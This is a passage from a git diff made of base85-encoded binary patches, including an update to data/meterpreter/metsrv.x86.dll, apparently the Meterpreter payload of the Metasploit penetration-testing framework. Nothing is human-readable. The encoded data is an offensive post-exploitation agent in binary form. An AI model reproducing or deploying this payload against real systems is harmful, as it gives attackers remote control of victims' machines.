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 
diff --git a/data/meterpreter/metsrv.x86.dll b/data/meterpreter/metsrv.x86.dll index ff44e5e52f823e43bca3dbafd6a690d464a0e2ea..65ff54d2cee9954a85519ed8fa45b7106ac3b53d 100755 GIT binary patch delta 56634 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 